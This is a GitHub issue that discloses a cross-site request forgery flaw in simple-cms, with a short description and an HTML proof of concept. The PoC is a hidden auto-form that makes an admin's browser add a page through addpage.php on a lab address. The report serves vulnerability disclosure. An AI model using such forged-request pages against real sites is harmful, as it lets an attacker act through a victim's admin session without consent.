Skip to content

simple-cms has Cross-site request forgery #3

New issue
New issue
Open
Open
simple-cms has Cross-site request forgery#3
@SunJ3t

Description

@SunJ3t
SunJ3t
opened on Aug 8, 2018

http://192.168.2.129/simple/admin/

I can add page when admin click the html file.

payload:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.2.129/simple/admin/addpage.php" method="POST">
      <input type="hidden" name="pageTitle" value="csrftest" />
      <input type="hidden" name="pageCont" value="csrftest" />
      <input type="hidden" name="submit" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions